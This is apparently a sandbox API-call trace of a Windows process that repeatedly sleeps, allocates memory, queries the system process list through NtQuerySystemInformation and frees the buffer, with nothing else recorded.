NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.736] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.736] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.737] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.737] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.737] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.739] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.740] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.745] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.747] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.747] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.747] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.748] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.750] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.750] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.762] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.762] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.763] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.763] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.766] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.766] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.777] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.778] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.778] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.779] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.779] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.781] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.782] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.793] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.794] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.794] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.796] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.797] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.808] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.808] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.809] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.809] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.811] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.811] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.825] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.826] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.826] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.827] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.827] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.830] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.831] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.841] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.842] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.843] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.843] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.843] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.846] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.848] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.855] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.855] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.855] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.855] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.856] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.857] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.858] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.870] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.870] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.871] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.871] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.871] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.874] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.875] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.888] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.889] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.889] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.889] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.889] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.891] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.892] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.901] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.902] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.902] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.903] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.903] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.905] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.906] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.937] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.937] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.938] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.938] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.938] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.940] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.941] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.948] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.949] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.949] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.949] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.950] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.952] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.952] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.964] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.964] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.965] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.965] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.965] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.967] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.968] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.979] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.980] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.980] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.980] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.983] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.983] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.996] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.996] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.997] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.997] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.997] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.999] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.000] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.011] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.011] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.012] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.012] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.012] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.014] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.015] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.026] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.027] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.027] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.027] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.028] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.030] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.030] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.042] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.042] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.043] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.043] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.043] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.045] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.046] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.058] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.058] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.058] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.059] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.059] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.062] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.063] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.073] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 